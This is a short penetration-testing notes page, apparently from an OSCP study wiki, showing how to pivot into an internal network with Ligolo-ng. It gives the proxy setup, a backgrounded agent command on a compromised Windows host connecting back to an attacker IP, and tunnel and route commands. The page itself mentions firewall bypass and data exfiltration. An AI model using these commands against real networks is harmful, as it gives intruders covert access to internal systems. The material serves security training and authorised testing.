Tunneling with Ligolo-ng

Ligolo-ng is a tool used for tunneling network traffic, primarily in penetration testing and security assessments. Its main purpose is to create a secure tunnel between a compromised machine and an attacker's server, allowing the attacker to access internal networks or services that are not directly reachable from the outside. This is especially useful for bypassing firewalls and for exfiltrating data or gaining further access within a target network. Ligolo-ng can support various protocols, making it versatile for different scenarios.

From Attacker Side - Start Server

sudo ligolo-proxy -selfcert
interface_create --name "oscp-chall"

From Victim Side - Connect to Server

start /B ligolo-agent.exe -ignore-cert -connect 192.168.45.188:11601

From Attacker Side - Start Tunneling

Then, from attacker side, after agent joined, run:

session
tunnel_start --tun "oscp-chall"
ifconfig
interface_add_route --name oscp-chall --route 10.10.70.0/24

Now, our machine will able to access internal targets.

PreviousPost Exploitation NextCredential Hunting

Last updated 1 year ago

hashtagFrom Attacker Side - Start Server

hashtagFrom Victim Side - Connect to Server

hashtagFrom Attacker Side - Start Tunneling

From Attacker Side - Start Server

From Victim Side - Connect to Server

From Attacker Side - Start Tunneling